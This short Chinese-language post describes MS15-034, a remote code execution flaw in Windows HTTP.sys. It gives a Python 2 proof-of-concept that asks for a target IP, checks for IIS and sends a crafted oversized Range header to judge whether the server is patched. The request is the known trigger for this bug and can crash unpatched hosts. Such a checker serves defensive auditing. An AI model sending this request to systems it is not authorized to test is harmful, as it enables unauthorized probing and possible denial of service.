远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
官方文档:https://technet.microsoft.com/zh-cn/library/security/MS15-034
POC(python2):
1 #!/usr/bin/env python 2 #-*-coding:utf-8-*- 3 4 import socket 5 import random 6 7 ipAddr = raw_input("Please set your target:") 8 hexAllFfff = "18446744073709551615" 9 req1 = "GET / HTTP/1.0 " 10 req = "GET / HTTP/1.1 Host: stuff Range: bytes=0-" + hexAllFfff + " " 11 12 print "[*] Audit Started" 13 14 try: 15 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 client_socket.connect((ipAddr, 80)) 17 client_socket.send(req1) 18 boringResp = client_socket.recv(1024) 19 if "Microsoft" not in boringResp: 20 print "[*] Not IIS" 21 exit(0) 22 client_socket.close() 23 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 client_socket.connect((ipAddr, 80)) 25 client_socket.send(req) 26 goodResp = client_socket.recv(1024) 27 if "Requested Range Not Satisfiable" in goodResp: 28 print "[!!] Looks VULN" 29 elif " The request has an invalid header name" in goodResp: 30 print "[*] Looks Patched" 31 else: 32 print "[*] Unexpected response, cannot discern patch status" 33 34 except Exception,e: 35 print e